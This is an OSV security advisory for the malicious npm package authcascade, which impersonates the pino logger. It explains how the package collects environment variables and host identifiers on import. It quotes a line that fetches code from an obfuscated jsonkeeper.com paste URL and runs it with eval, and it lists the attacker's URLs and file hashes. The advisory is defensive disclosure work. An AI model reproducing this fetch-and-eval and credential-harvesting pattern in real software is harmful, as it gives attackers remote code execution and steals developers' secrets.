MAL-2026-4491

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/authcascade/MAL-2026-4491.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4491
Published
2026-05-25T09:58:20Z
Modified
2026-05-26T06:02:14.647710287Z
Summary
Malicious code in authcascade (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9)

On require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval(): require('axios').get(atob(...)).then(r => { eval(r.data.data); }). A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module.

jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package.

The package additionally impersonates the legitimate pino logger: package.json sets main: pino.js, homepage: https://getpino.io, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T05:52:57.536665701Z",
            "versions": [
                "1.5.25"
            ],
            "sha256": "8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9",
            "id": "IN-MAL-2026-004618",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T09:58:20Z"
        },
        {
            "modified_time": "2026-05-25T13:47:37Z",
            "versions": [
                "1.5.26"
            ],
            "sha256": "da3c1c50bd72e5fb149916a0169ed0542bcf03457144189ac508629e2f1b12ff",
            "id": "IN-MAL-2026-004652",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:53:01.474840428Z"
        }
    ]
}
References
Credits

Affected packages

npm / authcascade

Package

Affected ranges

Affected versions

1.*
1.5.25
1.5.26

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "4ef10bd495900ba99f11ec69a5420d51fb2e5caa6a11d3656756df150a13524e",
            "tlsh": "4f2111a1d3966810223007b248db4460bae5f3612093419cb9bcd6c92ff38e2b154fe8",
            "path": "lib/writer.js"
        },
        {
            "sha256": "a01d6ff7073cedb09d8455b476349e938bd9e748da112b5db3b688bfc388692c",
            "tlsh": "46016665c9784e6306d915d24c2a0283aae1ad0b6908fd1d33d7931c1f8e4bf16bb26e",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-oHytPHKqRqjECOvdWWae+9XECBFm53hjnmHRe6YuYSY/U8QNFk0f4oAAY4gmeybiRJ4dH052R6Fe3zjmCGo1Rw==",
                "sha1": "b536fcfd356da7ffb7287fb48729bf6213a2030d"
            },
            "filename": "authcascade-1.5.25.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/authcascade/MAL-2026-4491.json"